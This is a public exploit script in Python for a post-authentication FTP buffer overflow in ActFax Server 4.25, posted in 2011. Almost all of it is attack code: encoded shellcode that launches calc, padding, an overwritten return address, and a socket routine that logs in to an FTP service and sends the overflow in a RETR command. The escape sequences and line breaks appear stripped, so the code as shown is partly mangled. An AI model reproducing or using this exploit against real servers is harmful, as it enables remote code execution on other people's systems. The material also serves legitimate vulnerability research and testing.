ActFax Server 4.25 FTP Buffer Overflow
Posted on 17 February 2011
#!/usr/bin/python # Exploit Title: ActFax Server FTP Remote BOF (post auth) # Date: Feb 15, 2011 # Author: chap0 # Software Link: http://www.actfax.com/download/actfax_setup_en.exe # Version: Version 4.25, Build 0221 (2010-02-11) # Tested on: Windows XP SP3 en # Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT # Stay true my friends import socket print " ActFax Server FTP Remote BOF" print " chap0 - www.seek-truth.net " # pops calc calccode = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkXlqELKZL587Pep7PdoaxsSSQbLPcLMw5JXbpX8KwOcHBPwkON0A" # push ebp #pop eax #sub eax,55555521 * 3 :) junk = "x55x58x2Dx21x55x55x55x2Dx21x55x55x55x2Dx21x55x55x55" + "C"*135 + calccode + "A"*(616-len(calccode)) payload = junk + "x37x27x40x00" #RETN s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.2',21)) s.recv(1024) s.send('USER ' + 'chapo ') print (s.recv(1024)) s.send('PASS chapo ') print (s.recv(1024)) s.send('RETR ' + payload + ' ') s.close
